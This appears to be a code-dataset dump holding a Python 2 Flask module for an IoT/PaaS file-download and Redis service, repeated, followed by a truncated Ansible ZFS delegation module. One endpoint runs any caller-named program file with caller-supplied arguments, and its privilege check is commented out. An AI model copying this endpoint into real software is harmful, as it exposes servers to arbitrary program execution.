# print "~~~~~trigger over~~~~~~"
# print datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')[::]
err_msg = "ok"
return
else:
if languages == "c": cmd.pop(0)
# print "!!!!!!!!!!!!!!!!!"
dicRet["StartProgramTime"] = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
process = subprocess_check_output_program(ConvertData().convert(cmd),SYSTEM)
# print "~~~~process~~~~"
# print process
# print "~~~~type process~~~~"
# print type(process)
dicRet["EndProgramTime"] = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
# print "!!!!!!!!!!!!!!!!!"
if process[0]:
dicRet["GetProgramResponse"] = {"output":process[1],"returncode":0}
err_msg = "ok"
else:
# print process[2]
del process[2]["cmd"]
dicRet["GetProgramResponse"] = process[2]
err_msg = "error"
except Exception as e:
print "~~~Exception~~~"
print datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')[::]
print e
print sys.exc_info()
finally:
if not selfUse:
# dicRet["THISTIME"] = datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')[::]
dicRet["Response"] = err_msg
return jsonify(**dicRet)
#}}}
#=======================================================
# Definition: For IoT 初始化IoT所需的redis mes_device_status keys(hash) from mysql table:
# Date: 12292020@Yishan
#=======================================================
# {{{def iot_redis_device_keys_init(SYSTEM)
@CUSTOMIZED_API.route('/api/<SYSTEM>/1.0/Customized/Init/Redis/Device/Keys', methods = ['GET'])
@docstring_parameter(ACCESS_SYSTEM_LIST=ACCESS_SYSTEM_LIST)
def iot_redis_device_keys_init(SYSTEM, selfUse=False):
"""
For IoT 初始化IoT所需的redis device keys(hash)
Args:
SYSTEM: 使用之系統名稱
Returns:
no return
"""
if not selfUse:
dicRet = appPaaS.preProcessRequest(request,system=SYSTEM)
uri_parameter = ["uid"]
result, result_msg = check_uri_parameter_exist(request,uri_parameter)
if not result:
dicRet["Response"] = result_msg
return jsonify( **dicRet)
all_device = {}
err_msg = "error"
try:
DbSession,metadata,engine= appPaaS.getDbSessionType(system=SYSTEM)
if DbSession is None:
return
sess = DbSession()
queryTable = Table("preload" , metadata, autoload=True)
for row in sess.query(queryTable).all():
drow = AdjustDataFormat().format(row._asdict())
all_device[drow["main_key"]+"_"+drow["combine_key"]] = json.loads(drow["combine_list"])
err_msg = "ok" #done successfully
# http://stackoverflow.com/questions/4112337/regular-expressions-in-sqlalchemy-queries
except Exception as e:
err_msg = appPaaS.catch_exception(e,sys.exc_info(),SYSTEM)
finally:
if 'DbSession' in locals().keys() and DbSession is not None:
sess.close()
DbSession.remove()
engine.dispose()
if err_msg != "ok":
if selfUse: return
if not selfUse:
dicRet["Response"] = err_msg
return jsonify( **dicRet)
err_msg = "error"
try:
redis_db = globalvar.SYSTEMLIST[globalvar.SERVERIP].index(SYSTEM)
dbRedis,_,_ = appPaaS.getDbSessionType(system=SYSTEM,dbName=redis_db,forRawData="redis")
if dbRedis is None:
return
for key,value in all_device.items():
#若key不存在,直接建立
if not dbRedis.exists(key):
dbRedis.hmset(key, value)
#若存在,比較value物件的key,抓取不重複的建立
else:
#差集(舊的多的key,需刪除)
fields_need_del = list(set(dbRedis.hkeys(key)).difference(value.keys()))
if fields_need_del: dbRedis.hdel(key, *fields_need_del)
#差集(新的多的key,需新增)
fields_need_add = list(set(value.keys()).difference(dbRedis.hkeys(key)))
if fields_need_add:
for value_key,value_value in value.items():
if value_key in fields_need_add:
dbRedis.hset(key, value_key, value_value)
#檢查mes_device_status_* keys是否需刪除(多的需刪除)
keys_need_del = list(set(dbRedis.keys("mes_device_status_*")).difference(all_device.keys()))
if keys_need_del: dbRedis.delete(*keys_need_del)
err_msg = "ok"
except Exception as e:
err_msg = appPaaS.catch_exception(e, sys.exc_info(), SYSTEM)
finally:
if not selfUse:
dicRet["Response"] = err_msg
return jsonify( **dicRet)
#}}} | 38.235294 | 142 | 0.57052 | # -*- coding: utf-8 -*-
#Department Module Description
"""
==============================================================================
created : 03/20/2017
Last update: 02/08/2021
Developer: Wei-Chun Chang
Lite Version 2 @Yishan08212019
API version 1.0
Filename: customizedHandle.py
Description: basically, all writes to the module will be opened to superuser only, for others, can only query data
1. register a department
2. query Department basic info.
3. query Department members
4. query Department sensors
Total = 6 APIs
==============================================================================
"""
#=======================================================
# System level modules
#=======================================================
#{{{
from sqlalchemy import *
from werkzeug.security import gen_salt
import subprocess #Yishan 05212020 subprocess 取代 os.popen
# import threading
#}}}
#=======================================================
# User level modules
#=======================================================
#{{{
from app import *
#Yishan@05212020 added for common modules
from app.modules import *
#}}}
__all__ = ('trigger_specific_program','iot_redis_device_keys_init')
ACCESS_SYSTEM_LIST = ["IOT"]
# # 建立 thread lock
# lock = threading.Lock()
#blueprint
CUSTOMIZED_API = Blueprint('CUSTOMIZED_API', __name__)
#{{{ def _list_iter(name)
def _list_iter(r,name):
"""
自定义redis列表增量迭代
:param name: redis中的name,即:迭代name对应的列表
:return: yield 返回 列表元素
"""
list_count = r.llen(name)
for index in range(list_count):
yield r.lindex(name, index)
#}}}
class TriggerProgramWorkerThread(threading.Thread):
def __init__(self, pid, lock, func, cmd, SYSTEM):
threading.Thread.__init__(self)
self.pid = pid
self.func = func
self.lock = lock
self.cmd = cmd
self.SYSTEM = SYSTEM
def run(self):
# 取得 lock
# self.lock.acquire()
# print "@@@@@@@@@@@@@@@@@@@@@@@TriggerProgram@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
# print "------Lock-----",self.pid
# print datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')[::],self.pid
# print "Lock acquired by pid %d" % self.pid
# print "------threading detail------",os.getpid()
# print threading.active_count() #用來查看目前有多少個線程
# print threading.current_thread().name #可以用來查看你在哪一個執行緒當中
self.func(self.cmd,self.SYSTEM)
# 釋放 lock
# self.lock.release()
# print "------released Lock-----",self.pid
# print "Lock released by pid %d" % self.pid
# print datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')[::],self.pid
# print "------threading detail------",os.getpid()
# print threading.active_count() #用來查看目前有多少個線程
# print threading.current_thread().name #可以用來查看你在哪一個執行緒當中
# print "@@@@@@@@@@@@@@@@@@@@@@@TriggerProgram end@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
# print
#=======================================================
# subprocess_check_output_program
# Date: 12142020@Yishan
# https://www.coder.work/article/3210794
# https://stackoverflow.com/questions/31683320/suppress-stderr-within-subprocess-check-output
#=======================================================
# {{{ def subprocess_check_output_program(cmd)
def subprocess_check_output_program(cmd,SYSTEM):
try:
# print "------func------",os.getpid()
# print datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')[::]
# print cmd
# process = subprocess.check_output(cmd,shell=False,stderr=subprocess.STDOUT)
with open(os.devnull, 'w') as devnull:
process = subprocess.check_output(cmd,shell=False,stderr=devnull)
# with subprocess.Popen(cmd, shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE) as proc:
# process = subprocess.Popen(cmd, shell=False, stdout=devnull, stderr=devnull)
# result = process.stdout.readlines()
# print "process.pid-> ",process.pid
# print process
# print "result-> ",result
# print os.getpid(),"~~~~subprocess_check_output_program~~~~",process
# print "------------------"
# print datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')[::]
# print "======================="
return True,process,{"returncode":0}
except subprocess.CalledProcessError as e:
print "~~~~e~~~~"
print e.__dict__
return False,appPaaS.catch_exception(e,sys.exc_info(),SYSTEM),e.__dict__
# }}}
#=======================================================
# 列出/var/www/html/download/files內所有檔案
# Date: 12142020@Yishan
#=======================================================
# {{{ CUSTOMIZED_API.route('/api/PaaS/1.0/Customized/Show/DownloadFiles', methods = ['POST']),
@CUSTOMIZED_API.route('/api/PaaS/1.0/Customized/Show/DownloadFiles', methods = ['GET'])
def show_downloadfiles(selfUse=False):
err_msg = "ok"
FILEPATH = "/var/www/html/download/files"
if not selfUse:
dicRet = appPaaS.preProcessRequest(request,system="PaaS")
uri_parameter = ["uid"]
result, result_msg = check_uri_parameter_exist(request,uri_parameter)
if not result:
dicRet["Response"] = result_msg
return jsonify( **dicRet)
fileList = []
try:
fileList = [f for f in os.listdir(FILEPATH)]
except Exception as e:
err_msg = appPaaS.catch_exception(e,sys.exc_info(),"PaaS")
if not selfUse:
dicRet["FileList"] = fileList
dicRet["Response"] = err_msg
return jsonify( **dicRet)
return fileList
# }}}
#=======================================================
# 提供使用者生成下載檔案列表之id & pwd (gen_salt)
# Date: 12142020@Yishan
#=======================================================
# {{{ CUSTOMIZED_API.route('/api/PaaS/1.0/Customized/Create/DownloadFiles/IdPwd', methods = ['POST']),
@CUSTOMIZED_API.route('/api/PaaS/1.0/Customized/Create/DownloadFiles/IdPwd', methods = ['POST'])
@decorator_check_content_type(request)
def create_downloadfiles_idpwd():
err_msg = "ok"
dicRet = appPaaS.preProcessRequest(request,system="PaaS")
uri_parameter = ["uid"]
result, result_msg = check_uri_parameter_exist(request,uri_parameter)
if not result:
dicRet["Response"] = result_msg
return jsonify( **dicRet)
if not VerifyDataStrLawyer(request.data).verify_json():
dicRet["Response"] = "error input '{}' is illegal JSON".format(request.data)
return jsonify( **dicRet)
reqdataList = ConvertData().convert(json.loads(request.data))
if not isinstance(reqdataList,list):
dicRet["Response"] = "post data必須傳陣列"
return jsonify( **dicRet)
FILEPATH = "/var/www/html/download/files/"
#檢查丟上來的data是否存在
for i in reqdataList:
if not isinstance(i,str):
dicRet["Response"] = "'{}' 必須為字串".format(i)
return jsonify( **dicRet)
if not os.path.isfile(os.path.join(FILEPATH,i)):
dicRet["Response"] = "{} 檔案不存在或路徑有誤".format(i)
return jsonify( **dicRet)
ID = gen_salt(24)
PWD = gen_salt(48)
recList = []
try:
dbRedis,_,result= appPaaS.getDbSessionType(system="PaaS",dbName=15,forRawData="redis")
if dbRedis is None:
#表示連接資料庫有問題
dicRet["Response"] = result
return jsonify( **dicRet)
redis_key = ID+"_"+PWD
#設立基準點過期時間為後天的00:30
rederence_extime = int(time.mktime(time.strptime(str(date.today() + timedelta(days=2))+" 00:30:00", '%Y-%m-%d %H:%M:%S')))
redishash_already_set_expireat = False
#基準點若存在需判斷此次建立是否需增加基準點期限秒數(小於兩天:172800s,直接以今天為基準多加兩天)
if dbRedis.exists("rederence_point"):
if dbRedis.ttl("rederence_point") < 172800:
dbRedis.expireat("rederence_point",rederence_extime)
redishash_already_set_expireat = True
# if dbRedis.hexists("rederence_point",redis_key): #正常情況下不可能會有重複ID&PWD,但若重複了,while重新建立一次
# status = True
# while status:
# redis_key = str(gen_salt(24))+"_"+str(gen_salt(48))
# status = dbRedis.hexists("rederence_point",redis_key)
# else:
# dbRedis.hmset("rederence_point",{redis_key:json.dumps(reqdataList)})
#不存在,建立基準點value為檔案列表,期限為兩天後 (hash)
# else:
# dbRedis.hmset("rederence_point",{redis_key:json.dumps(reqdataList)})
# dbRedis.expireat("rederence_point",rederence_extime)
# rederence_point : {"filename":[redis_key,.....]}
#建立ID_PWD:reqdataList(list)
if dbRedis.llen(redis_key) != 0:
status = True
while status:
redis_key = str(gen_salt(24))+"_"+str(gen_salt(48))
if dbRedis.llen(redis_key) == 0: status = False
for i in reqdataList:
dbRedis.lpush(redis_key, i)
if dbRedis.hexists("rederence_point",i):
this_list = json.loads(dbRedis.hget("rederence_point", i))
this_list.append(redis_key)
dbRedis.hmset("rederence_point",{i:json.dumps(this_list)})
else:
dbRedis.hmset("rederence_point",{i:json.dumps([redis_key])})
dbRedis.expire(redis_key,86400)
if not redishash_already_set_expireat:
dbRedis.expireat("rederence_point",rederence_extime)
dicRet["ID"] = ID
dicRet["PWD"] = PWD
dicRet["DownloadList"] = reqdataList
err_msg = "ok"
except Exception as e:
err_msg = appPaaS.catch_exception(e,sys.exc_info(),"PaaS")
dicRet["Response"] = err_msg
return jsonify( **dicRet)
#}}}
#=======================================================
# 檢驗欲使用下載檔案功能之id & pwd合法性
# Date: 12142020@Yishan
#=======================================================
# {{{ CUSTOMIZED_API.route('/api/PaaS/1.0/Customized/Check/DownloadFiles/IdPwd', methods = ['POST']),
@CUSTOMIZED_API.route('/api/PaaS/1.0/Customized/Check/DownloadFiles/IdPwd', methods = ['POST'])
@decorator_check_content_type(request)
def check_downloadfiles_idpwd():
err_msg = "ok"
dicRet = appPaaS.preProcessRequest(request,system="PaaS")
uri_parameter = ["uid"]
result, result_msg = check_uri_parameter_exist(request,uri_parameter)
if not result:
dicRet["Response"] = result_msg
return jsonify( **dicRet)
if not VerifyDataStrLawyer(request.data).verify_json():
dicRet["Response"] = "error input '{}' is illegal JSON".format(request.data)
return jsonify( **dicRet)
reqdataDict = ConvertData().convert(json.loads(request.data))
post_parameter = ["Id","Pwd"]
if not check_post_parameter_exist(reqdataDict,post_parameter):
dicRet["Response"] = "Missing post parameters : '{}'".format(post_parameter)
return jsonify( **dicRet)
Id = reqdataDict.get("Id").encode("utf8").strip()
Pwd = reqdataDict.get("Pwd").encode("utf8").strip()
recList = []
try:
dbRedis,_,result= appPaaS.getDbSessionType(system="PaaS",dbName=15,forRawData="redis")
if dbRedis is None:
#表示連接資料庫有問題
dicRet["Response"] = result
return jsonify( **dicRet)
redis_key = Id+"_"+Pwd
if not dbRedis.exists(redis_key):
dicRet["Response"] = "帳號或密碼錯誤"
return jsonify( **dicRet)
download_List = []
download_List = [item for item in _list_iter(dbRedis,redis_key)]
dicRet["DownloadList"] = download_List
err_msg = "ok"
except Exception as e:
err_msg = appPaaS.catch_exception(e,sys.exc_info(),"PaaS")
dicRet["Response"] = err_msg
return jsonify( **dicRet)
#}}}
#=======================================================
# 檢驗欲使用下載檔案的有效期限若超過則刪除
# Date: 12142020@Yishan
#=======================================================
# {{{ CUSTOMIZED_API.route('/api/PaaS/1.0/Customized/Check/Delete/DownloadFiles/Deadline/<CRONTAB>', methods = ['GET']),
@CUSTOMIZED_API.route('/api/PaaS/1.0/Customized/Check/Delete/DownloadFiles/Deadline/<CRONTAB>', methods = ['GET'])
def check_delete_downloadfiles_deadline(CRONTAB="DAY"):
err_msg = "ok"
dicRet = appPaaS.preProcessRequest(request,system="PaaS")
uri_parameter = ["uid"]
result, result_msg = check_uri_parameter_exist(request,uri_parameter)
if not result:
dicRet["Response"] = result_msg
return jsonify( **dicRet)
FILEPATH = "/var/www/html/download/files/"
try:
dbRedis,_,result= appPaaS.getDbSessionType(system="PaaS",dbName=15,forRawData="redis")
if dbRedis is None:
#表示連接資料庫有問題
dicRet["Response"] = result
return jsonify( **dicRet)
#此為每天的crontab要做的排程(00:45)
#抓出redis hash : rederence_point內的檔案(key):[id&pwd(value)],一一查看value是否exists in redis,不存在代表id&pwd已過期,即可移除此value;
#when loop run over,len=0 => 此檔案無人要下載了,直接刪除 , else update new value
if CRONTAB == "DAY":
for key,value in dbRedis.hgetall("rederence_point").items():
new_value = []
for i in json.loads(value):
if dbRedis.exists(i):
new_value.append(i)
else:
#新的value list沒有資料,將此檔案刪除,rederence_point hash key del
if not new_value:
if os.path.isfile(os.path.join(FILEPATH,key)): os.remove(os.path.join(FILEPATH,key))
dbRedis.hdel("rederence_point", key)
else:
dbRedis.hmset("rederence_point",{key:json.dumps(new_value)})
#此為每個禮拜天的crontab要做的排程(Sunday 01:00)
#先抓出所有檔案,再去redis看這些檔案(key)在hash : rederence_point是否存在,存在代表有id&pwd需要下載,不存在表示無人下載即可刪除
elif CRONTAB == "WEEK":
fileList = show_downloadfiles(True)
for i in fileList:
if i not in dbRedis.hkeys("rederence_point") and os.path.isfile(os.path.join(FILEPATH,i)): os.remove(os.path.join(FILEPATH,i))
err_msg = "ok"
except Exception as e:
err_msg = appPaaS.catch_exception(e,sys.exc_info(),"PaaS")
dicRet["Response"] = err_msg
return jsonify( **dicRet)
#}}}
#=======================================================
# 提供api觸發指定程式
# Date: 12142020@Yishan
#=======================================================
# {{{ CUSTOMIZED_API.route('/api/<SYSTEM>/1.0/Customized/Trigger/Specific/Program', methods = ['GET']),
@CUSTOMIZED_API.route('/api/<SYSTEM>/1.0/Customized/Trigger/Specific/Program', methods = ['POST'])
@docstring_parameter(ACCESS_SYSTEM_LIST=ACCESS_SYSTEM_LIST)
def trigger_specific_program(SYSTEM,selfUse=False,useThread=False,languages=None,programName=None,programData=None,Temp=False):
#{{{APIINFO
'''
{
"API_application":"提供觸發指定程式",
"API_parameters":{"uid":"使用者帳號"},
"API_path_parameters":{"SYSTEM":"合法的系統名稱"},
"API_postData":{
"bodytype":"Object",
"bodyschema":"{}",
"parameters":{
"languages":{"type":"String","requirement":"required","directions":"欲觸發的程式語言類型","example":"php"},
"programName":{"type":"String","requirement":"required","directions":"欲觸發的程式路徑加檔名","example":"/var/www/html/test.php"},
"programData":{"type":"Unlimited","requirement":"optional","directions":"欲丟入觸發程式的參數資料","example":"test"}
},
"precautions":{
"注意事項1":"languages目前只接受php語言",
"注意事項2":"programName程式路徑必須存在"
},
"example":[
{
"languages":"php",
"programName":"test.php",
"programData":"123"
}
]
},
"API_message_parameters":{"GetProgramResponse":"Unlimited+取得觸發程式回傳的值"},
"API_example":{
"Response": "ok",
"APIS": "POST /api/IOT/1.0/Customized/Trigger/Specific/Program",
"OperationTime": "3.020",
"BytesTransferred": 223,
"System": "IOT",
"GetProgramResponse": "test"
}
}
'''
#}}}
err_msg = "error"
languages_config = {
"php":"/usr/bin/php",
"c":""
}
if not selfUse:
dicRet = appPaaS.preProcessRequest(request,system=SYSTEM)
# if SYSTEM not in list(set(globalvar.SYSTEMLIST[globalvar.SERVERIP]).intersection(set(ACCESS_SYSTEM_LIST))):
# dicRet["Response"] = "system:{} has no privillege to use this API".format(SYSTEM)
# return jsonify( **dicRet)
uri_parameter = ["uid"]
result, result_msg = check_uri_parameter_exist(request,uri_parameter)
if not result:
dicRet["Response"] = result_msg
return jsonify( **dicRet)
if not VerifyDataStrLawyer(request.data).verify_json():
dicRet["Response"] = "error input '{}' is illegal JSON".format(request.data)
return jsonify( **dicRet)
reqdataDict = json.loads(request.data)
if isinstance(reqdataDict,type(u"")):
reqdataDict = json.loads(reqdataDict)
post_parameter = ["languages","programName","programData"]
if not check_post_parameter_exist(reqdataDict,post_parameter):
dicRet["Response"] = "Missing post parameters : '{}'".format(post_parameter)
return jsonify( **dicRet)
languages = reqdataDict.get("languages")
programName = reqdataDict.get("programName")
programData = reqdataDict.get("programData")
# print "~~~~languages~~~~"
# print languages
if languages not in languages_config.keys():
dicRet["Response"] = "Currently only php and C programs can be executed"
return jsonify( **dicRet)
# print "~~~~programName~~~~"
# print programName
# print "~~~~programData~~~~"
# print programData
# print type(programData)
if isinstance(programData,dict): programData = json.dumps(programData)
# print "~~~~programData~~~~"
# print programData
if not os.path.isfile(programName):
dicRet["Response"] = "{} 檔案不存在或路徑有誤".format(programName)
return jsonify( **dicRet)
cmd = [languages_config[languages],programName]
if programData: cmd.append(programData)
# cmd = "{}{}".format(languages_config[languages],programName)
# if programData: cmd+=" '{}'".format(programData)
# print "~~~cmd~~~"
# print cmd
try:
if useThread:
# print "~~~~~trigger start~~~~~~"
# print datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')[::]
if Temp:
from celeryApp.celeryTasks import celery_trigger_specific_program
celery_trigger_specific_program.apply_async(args=(cmd,SYSTEM), routing_key='high', queue="H-queue1")
else:
worker = TriggerProgramWorkerThread(os.getpid(), lock, subprocess_check_output_program, cmd, SYSTEM)
worker.start()
# print "~~~~~trigger over~~~~~~"
# print datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')[::]
err_msg = "ok"
return
else:
if languages == "c": cmd.pop(0)
# print "!!!!!!!!!!!!!!!!!"
dicRet["StartProgramTime"] = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
process = subprocess_check_output_program(ConvertData().convert(cmd),SYSTEM)
# print "~~~~process~~~~"
# print process
# print "~~~~type process~~~~"
# print type(process)
dicRet["EndProgramTime"] = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
# print "!!!!!!!!!!!!!!!!!"
if process[0]:
dicRet["GetProgramResponse"] = {"output":process[1],"returncode":0}
err_msg = "ok"
else:
# print process[2]
del process[2]["cmd"]
dicRet["GetProgramResponse"] = process[2]
err_msg = "error"
except Exception as e:
print "~~~Exception~~~"
print datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')[::]
print e
print sys.exc_info()
finally:
if not selfUse:
# dicRet["THISTIME"] = datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')[::]
dicRet["Response"] = err_msg
return jsonify(**dicRet)
#}}}
#=======================================================
# Definition: For IoT 初始化IoT所需的redis mes_device_status keys(hash) from mysql table:
# Date: 12292020@Yishan
#=======================================================
# {{{def iot_redis_device_keys_init(SYSTEM)
@CUSTOMIZED_API.route('/api/<SYSTEM>/1.0/Customized/Init/Redis/Device/Keys', methods = ['GET'])
@docstring_parameter(ACCESS_SYSTEM_LIST=ACCESS_SYSTEM_LIST)
def iot_redis_device_keys_init(SYSTEM, selfUse=False):
"""
For IoT 初始化IoT所需的redis device keys(hash)
Args:
SYSTEM: 使用之系統名稱
Returns:
no return
"""
if not selfUse:
dicRet = appPaaS.preProcessRequest(request,system=SYSTEM)
uri_parameter = ["uid"]
result, result_msg = check_uri_parameter_exist(request,uri_parameter)
if not result:
dicRet["Response"] = result_msg
return jsonify( **dicRet)
all_device = {}
err_msg = "error"
try:
DbSession,metadata,engine= appPaaS.getDbSessionType(system=SYSTEM)
if DbSession is None:
return
sess = DbSession()
queryTable = Table("preload" , metadata, autoload=True)
for row in sess.query(queryTable).all():
drow = AdjustDataFormat().format(row._asdict())
all_device[drow["main_key"]+"_"+drow["combine_key"]] = json.loads(drow["combine_list"])
err_msg = "ok" #done successfully
# http://stackoverflow.com/questions/4112337/regular-expressions-in-sqlalchemy-queries
except Exception as e:
err_msg = appPaaS.catch_exception(e,sys.exc_info(),SYSTEM)
finally:
if 'DbSession' in locals().keys() and DbSession is not None:
sess.close()
DbSession.remove()
engine.dispose()
if err_msg != "ok":
if selfUse: return
if not selfUse:
dicRet["Response"] = err_msg
return jsonify( **dicRet)
err_msg = "error"
try:
redis_db = globalvar.SYSTEMLIST[globalvar.SERVERIP].index(SYSTEM)
dbRedis,_,_ = appPaaS.getDbSessionType(system=SYSTEM,dbName=redis_db,forRawData="redis")
if dbRedis is None:
return
for key,value in all_device.items():
#若key不存在,直接建立
if not dbRedis.exists(key):
dbRedis.hmset(key, value)
#若存在,比較value物件的key,抓取不重複的建立
else:
#差集(舊的多的key,需刪除)
fields_need_del = list(set(dbRedis.hkeys(key)).difference(value.keys()))
if fields_need_del: dbRedis.hdel(key, *fields_need_del)
#差集(新的多的key,需新增)
fields_need_add = list(set(value.keys()).difference(dbRedis.hkeys(key)))
if fields_need_add:
for value_key,value_value in value.items():
if value_key in fields_need_add:
dbRedis.hset(key, value_key, value_value)
#檢查mes_device_status_* keys是否需刪除(多的需刪除)
keys_need_del = list(set(dbRedis.keys("mes_device_status_*")).difference(all_device.keys()))
if keys_need_del: dbRedis.delete(*keys_need_del)
err_msg = "ok"
except Exception as e:
err_msg = appPaaS.catch_exception(e, sys.exc_info(), SYSTEM)
finally:
if not selfUse:
dicRet["Response"] = err_msg
return jsonify( **dicRet)
#}}} | 11,214 | 30 | 186 |
6b3efd1aae05ddf74ce1988978831f8593a45457 | 9,521 | py | Python | kubernetes-the-hard-way/system/collections/ansible_collections/community/general/plugins/modules/storage/zfs/zfs_delegate_admin.py | jkroepke/homelab | ffdd849e39b52972870f5552e734fd74cb1254a1 | [
"Apache-2.0"
] | 5 | 2020-12-16T21:42:09.000Z | 2022-03-28T16:04:32.000Z | kubernetes-the-hard-way/system/collections/ansible_collections/community/general/plugins/modules/storage/zfs/zfs_delegate_admin.py | jkroepke/kubernetes-the-hard-way | 70fd096a04addec0777744c9731a4e3fbdc40c8f | [
"Apache-2.0"
] | null | null | null | kubernetes-the-hard-way/system/collections/ansible_collections/community/general/plugins/modules/storage/zfs/zfs_delegate_admin.py | jkroepke/kubernetes-the-hard-way | 70fd096a04addec0777744c9731a4e3fbdc40c8f | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2015, Nate Coraor <nate@coraor.org>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = r'''
---
module: zfs_delegate_admin
short_description: Manage ZFS delegated administration (user admin privileges)
description:
- Manages ZFS file system delegated administration permissions, which allow unprivileged users to perform ZFS
operations normally restricted to the superuser.
- See the C(zfs allow) section of C(zfs(1M)) for detailed explanations of options.
- This module attempts to adhere to the behavior of the command line tool as much as possible.
requirements:
- "A ZFS/OpenZFS implementation that supports delegation with `zfs allow`, including: Solaris >= 10, illumos (all
versions), FreeBSD >= 8.0R, ZFS on Linux >= 0.7.0."
options:
name:
description:
- File system or volume name e.g. C(rpool/myfs).
required: true
type: str
state:
description:
- Whether to allow (C(present)), or unallow (C(absent)) a permission.
- When set to C(present), at least one "entity" param of I(users), I(groups), or I(everyone) are required.
- When set to C(absent), removes permissions from the specified entities, or removes all permissions if no entity params are specified.
required: true
choices: [ absent, present ]
default: present
users:
description:
- List of users to whom permission(s) should be granted.
type: list
groups:
description:
- List of groups to whom permission(s) should be granted.
type: list
everyone:
description:
- Apply permissions to everyone.
type: bool
default: no
permissions:
description:
- The list of permission(s) to delegate (required if C(state) is C(present)).
type: list
choices: [ allow, clone, create, destroy, diff, hold, mount, promote, readonly, receive, release, rename, rollback, send, share, snapshot, unallow ]
local:
description:
- Apply permissions to C(name) locally (C(zfs allow -l)).
type: bool
descendents:
description:
- Apply permissions to C(name)'s descendents (C(zfs allow -d)).
type: bool
recursive:
description:
- Unallow permissions recursively (ignored when C(state) is C(present)).
type: bool
default: no
author:
- Nate Coraor (@natefoo)
'''
EXAMPLES = r'''
- name: Grant `zfs allow` and `unallow` permission to the `adm` user with the default local+descendents scope
community.general.zfs_delegate_admin:
name: rpool/myfs
users: adm
permissions: allow,unallow
- name: Grant `zfs send` to everyone, plus the group `backup`
community.general.zfs_delegate_admin:
name: rpool/myvol
groups: backup
everyone: yes
permissions: send
- name: Grant `zfs send,receive` to users `foo` and `bar` with local scope only
community.general.zfs_delegate_admin:
name: rpool/myfs
users: foo,bar
permissions: send,receive
local: yes
- name: Revoke all permissions from everyone (permissions specifically assigned to users and groups remain)
community.general.zfs_delegate_admin:
name: rpool/myfs
everyone: yes
state: absent
'''
# This module does not return anything other than the standard
# changed/state/msg/stdout
RETURN = '''
'''
from itertools import product
from ansible.module_utils.basic import AnsibleModule
if __name__ == '__main__':
main()
| 35.928302 | 152 | 0.595106 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2015, Nate Coraor <nate@coraor.org>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = r'''
---
module: zfs_delegate_admin
short_description: Manage ZFS delegated administration (user admin privileges)
description:
- Manages ZFS file system delegated administration permissions, which allow unprivileged users to perform ZFS
operations normally restricted to the superuser.
- See the C(zfs allow) section of C(zfs(1M)) for detailed explanations of options.
- This module attempts to adhere to the behavior of the command line tool as much as possible.
requirements:
- "A ZFS/OpenZFS implementation that supports delegation with `zfs allow`, including: Solaris >= 10, illumos (all
versions), FreeBSD >= 8.0R, ZFS on Linux >= 0.7.0."
options:
name:
description:
- File system or volume name e.g. C(rpool/myfs).
required: true
type: str
state:
description:
- Whether to allow (C(present)), or unallow (C(absent)) a permission.
- When set to C(present), at least one "entity" param of I(users), I(groups), or I(everyone) are required.
- When set to C(absent), removes permissions from the specified entities, or removes all permissions if no entity params are specified.
required: true
choices: [ absent, present ]
default: present
users:
description:
- List of users to whom permission(s) should be granted.
type: list
groups:
description:
- List of groups to whom permission(s) should be granted.
type: list
everyone:
description:
- Apply permissions to everyone.
type: bool
default: no
permissions:
description:
- The list of permission(s) to delegate (required if C(state) is C(present)).
type: list
choices: [ allow, clone, create, destroy, diff, hold, mount, promote, readonly, receive, release, rename, rollback, send, share, snapshot, unallow ]
local:
description:
- Apply permissions to C(name) locally (C(zfs allow -l)).
type: bool
descendents:
description:
- Apply permissions to C(name)'s descendents (C(zfs allow -d)).
type: bool
recursive:
description:
- Unallow permissions recursively (ignored when C(state) is C(present)).
type: bool
default: no
author:
- Nate Coraor (@natefoo)
'''
EXAMPLES = r'''
- name: Grant `zfs allow` and `unallow` permission to the `adm` user with the default local+descendents scope
community.general.zfs_delegate_admin:
name: rpool/myfs
users: adm
permissions: allow,unallow
- name: Grant `zfs send` to everyone, plus the group `backup`
community.general.zfs_delegate_admin:
name: rpool/myvol
groups: backup
everyone: yes
permissions: send
- name: Grant `zfs send,receive` to users `foo` and `bar` with local scope only
community.general.zfs_delegate_admin:
name: rpool/myfs
users: foo,bar
permissions: send,receive
local: yes
- name: Revoke all permissions from everyone (permissions specifically assigned to users and groups remain)
community.general.zfs_delegate_admin:
name: rpool/myfs
everyone: yes
state: absent
'''
# This module does not return anything other than the standard
# changed/state/msg/stdout
RETURN = '''
'''
from itertools import product
from ansible.module_utils.basic import AnsibleModule
class ZfsDelegateAdmin(object):
def __init__(self, module):
self.module = module
self.name = module.params.get('name')
self.state = module.params.get('state')
self.users = module.params.get('users')
self.groups = module.params.get('groups')
self.everyone = module.params.get('everyone')
self.perms = module.params.get('permissions')
self.scope = None
self.changed = False
self.initial_perms = None
self.subcommand = 'allow'
self.recursive_opt = []
self.run_method = self.update
self.setup(module)
def setup(self, module):
""" Validate params and set up for run.
"""
if self.state == 'absent':
self.subcommand = 'unallow'
if module.params.get('recursive'):
self.recursive_opt = ['-r']
local = module.params.get('local')
descendents = module.params.get('descendents')
if (local and descendents) or (not local and not descendents):
